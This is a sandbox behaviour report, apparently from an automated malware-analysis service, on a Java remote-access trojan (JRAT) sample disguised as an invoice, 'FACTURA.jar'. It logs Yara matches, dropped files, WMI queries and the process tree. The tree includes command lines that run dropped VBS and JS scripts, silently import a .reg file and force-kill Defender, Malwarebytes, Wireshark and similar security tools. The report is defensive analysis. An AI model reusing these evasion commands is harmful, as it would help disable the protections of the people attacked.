Source: API-MS-Win-core-xstate-l2-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Yara signature match
Source: C:\Users\user\AppData\Local\Temp\_0.963648387626213409653739306438380.class, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\ultekbvsw.txt, type: DROPPED Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: classification engine Classification label: mal100.phis.troj.expl.evad.winJAR@193/300@1/2
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe File created: C:\Users\user\gcahfpmhcn.js Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6364:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8104:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2172:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2720:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2652:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4451837785175678294.vbs
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\xcopy.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: FACTURA.jar ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\FACTURA.jar"" >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\FACTURA.jar"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\gcahfpmhcn.js
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\ultekbvsw.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.963648387626213409653739306438380.class
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4451837785175678294.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4451837785175678294.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6922435490390475939.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6922435490390475939.vbs
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Source: C:\Windows\SysWOW64\xcopy.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\FACTURA.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\gcahfpmhcn.js Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\ultekbvsw.txt" Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.963648387626213409653739306438380.class Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4451837785175678294.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
